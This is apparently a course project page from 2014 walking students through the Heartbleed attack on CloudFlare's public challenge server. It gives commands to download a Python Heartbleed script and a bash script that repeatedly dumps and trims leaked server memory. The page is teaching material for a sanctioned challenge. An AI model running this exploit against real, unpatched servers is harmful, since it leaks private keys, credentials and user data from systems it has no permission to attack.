Attacking the CloudFlare Challenge Server with Heartbleed

Wow! The Key is Easy to Find!

The challenge was solved, and after Kevin (a CCSF student) showed me his solution, I tried it and it was very easy to find large parts of the key in just 100 requests, as shown below.

HOWEVER--It occurs to me that there is a simple explanation. I don't think we are really finding the original key--we are finding the RAM used by the real winner when he submitted the key.

What You Need

Get the Python Heartbleed Test Source Code

In a Terminal window, execute these commands:
cd

wget http://samsclass.info/120/proj/hb1.pyx

mv hb1.pyx hb1.py

Make a Script

In a text editor, open a file named attack-cloudflare and paste in this script:
#!/bin/bash
python hb1.py www.cloudflarechallenge.com > /tmp/attackcf0
tail -n 1026 /tmp/attackcf0 | head -n 1024 > /tmp/attackcf1
cut -c 58-73 /tmp/attackcf1 > /tmp/attackcf2
tr -d '\n' < /tmp/attackcf2 > /tmp/attackcf3
tr -d '.' < /tmp/attackcf3 > /tmp/attackcf4
cat /tmp/attackcf4
Make it executable with chmod a+x

Each time you execute that script, it will grab a random chunk of RAM from CloudFlare's server.

More Heartbleed tests and projects


Posted 4-11-14 1:38 pm by Sam Bowne
Solution video added 4-11-14 6:15 pm